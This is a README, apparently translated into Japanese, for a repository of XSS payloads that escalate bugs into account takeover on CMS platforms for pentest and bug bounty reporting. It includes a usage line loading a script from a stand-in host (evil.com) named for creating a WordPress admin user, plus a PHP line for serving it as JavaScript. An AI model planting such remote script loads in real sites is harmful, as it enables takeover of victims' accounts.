
XSS payloads designed to turn alert(1) into P1
XSSペイロードはalert(1)をP1に変えるために設計されました。
このリポジトリは「How to Upgrade Your XSS Bugs from Medium to Critical」というタイトルのブログ記事とともに公開されました。 https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
このリポジトリには、一般的なCMSプラットフォーム上で被害者のブラウザのコンテキストで機密性の高い機能を実行するために、XSSペイロードに読み込むことができるJavaScriptファイルが多数含まれています。これにより、単純なXSSバグを、アカウント乗っ取りのようなより深刻な問題に連鎖させることができます。
これは、実際のセキュリティへの影響を実証することで、ペンテストやバグバウンティレポートの重大度を高めるのに最適です。
ペイロードは、時間がある限り少しずつ追加されています。今後さらに多くのペイロードが追加される予定です。もし協力していただけるなら、プルリクエストを歓迎します!何を作成すべきかのヒントを探している場合は、このリポジトリの「issues」タブを確認してください。
これらのペイロードを使用する最も簡単な方法は、どこかにホストして、次のようにXSSペイロードのscriptタグのsrc属性に読み込むことです。
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
あるいは、ペイロードのコンテキストと長さによっては、minifyしたり、エンコードして、リクエストに直接含めることもできます。
JavaScriptファイルをホストするには、Content-Typeをapplication/javascriptに設定する必要がある場合があります。これをPHPで実現するには、次の行を任意のペイロードの先頭に追加し、.phpファイルとして保存して、PHP対応のWebサーバーでホストするだけです。
<?php header("Content-Type: application/javascript"); ?>
このリポジトリを作成するきっかけとなったのは、Shift8によるこの記事です。記事内のJSにはいくつか軽微なタイプミスがありますが、コンセプトは正確です。